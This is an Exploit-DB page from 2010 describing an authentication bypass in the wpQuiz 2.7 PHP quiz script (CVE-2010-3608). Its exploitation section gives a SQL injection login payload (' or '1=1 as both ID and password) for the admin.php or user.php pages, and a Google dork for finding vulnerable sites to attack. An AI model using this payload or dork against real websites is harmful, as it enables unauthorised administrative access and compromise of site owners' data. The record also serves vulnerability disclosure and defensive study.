ad

wpQuiz 2.7 - Authentication Bypass Vulnerability



EDB-ID: 15075 CVE: 2010-3608 OSVDB-ID: 68207
Author: KnocKout Published: 2010-09-21 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
Powered by wpQuiz - Auth bypass Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[+] Greatz : DaiMon 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~

http://[Victim]/path/admin.php 
                     [or user.php]

for bypass() bySQL

ID : ' or '1=1
PW : ' or '1=1

              GOODLuck ;)
              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~